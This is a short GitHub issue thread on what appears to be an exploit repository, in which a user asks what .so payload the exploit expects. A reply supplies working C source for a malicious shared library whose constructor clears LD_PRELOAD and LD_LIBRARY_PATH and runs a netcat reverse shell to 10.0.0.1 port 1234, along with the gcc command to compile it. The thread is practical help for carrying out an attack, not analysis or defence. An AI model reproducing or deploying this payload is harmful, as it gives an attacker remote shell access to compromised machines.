### ISSUE TITLE
.so payload question

### ISSUE THREAD

**Issue by init5-SF** [0x00string/oldays#7]
Hello, first thanks for  your great work!

I have a quick question regarding the .so payload this exploit is expecting, if I create a normal txt file with the name exploit.so and the content is:
```
#!/bin/bash
<reverse shell here>
```
will that work? or I need to create an actual .so payload using msfvenom?

Thank you!

**Comment by ghost** [comment]
No, you need to create a shared object library using gcc. Here is a template:

`#include <stdlib.h>`
`__attribute__((constructor)) static void run(void) {`
`  // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,`
`  // prevent recursion through system()`
`  unsetenv("LD_PRELOAD");`
`  unsetenv("LD_LIBRARY_PATH");`
`  system("nc -e /bin/sh 10.0.0.1 1234");`
`}`

Save the above code as a .c file (e.g. evil_lib.c), then use this command to compile it into a .so payload:

gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall
